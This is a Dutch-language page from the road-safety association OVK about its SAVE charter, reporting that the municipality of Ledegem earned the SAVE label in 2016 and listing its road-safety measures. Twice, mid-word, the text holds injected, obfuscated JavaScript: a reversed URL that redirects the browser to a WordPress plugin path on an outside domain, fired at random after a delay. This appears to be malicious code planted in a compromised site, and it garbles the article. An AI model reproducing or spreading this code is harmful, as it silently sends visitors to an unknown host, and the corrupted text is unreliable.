Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Ledegem ontvangt SAVE-label

Op 29/04/2013 ondertekende Ledegem het SAVE-charter. Hiermee ging ze het engagement aan te werken aan een SAVE-actieplan verkeersveiligheid gestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toeld op de 7 SAVE-doelstellingen. Het actieplan van Ledegem ging iets later dat jaar van start. Het liet wat op zich wachten maar op maandag 29 februari 2016 was het zo ver, Ledegem kreeg als 18e in Vlaanderen het SAVE-label omdat ze hun SAVE-actiejaar succesvol heeft afgerond. Dit is de 6e labeluitreiking in West-Vlaanderen waar ze voorafgegaan werden door Anzegem, Bredene, Deerlijk, Zuienkerke en Zedelgem.

Niet alle acties die in het actieplan van Ledegem waren opgenomen, werden afgerond. Enkele grote infrastructuurproject liepen vertraging op door onteigeningsprocedures die moeilijk verlopen en doordat sommige timingen niet louter afhangen van de gemeente alleen maar ook van partners als de Provincie en AWV. Wel werd er onder andere accentverlichting geplaatst aan drukke verkeersassen, er staan ondertussen octoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topuspalen aan de scholen, er werden verschillende analyses uitgevoerd in de aanloop van het mobiliteitsplan, in 2013 werden accenten geplaatst op het thema verkeersveiligheid in het gemeenteblad…


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be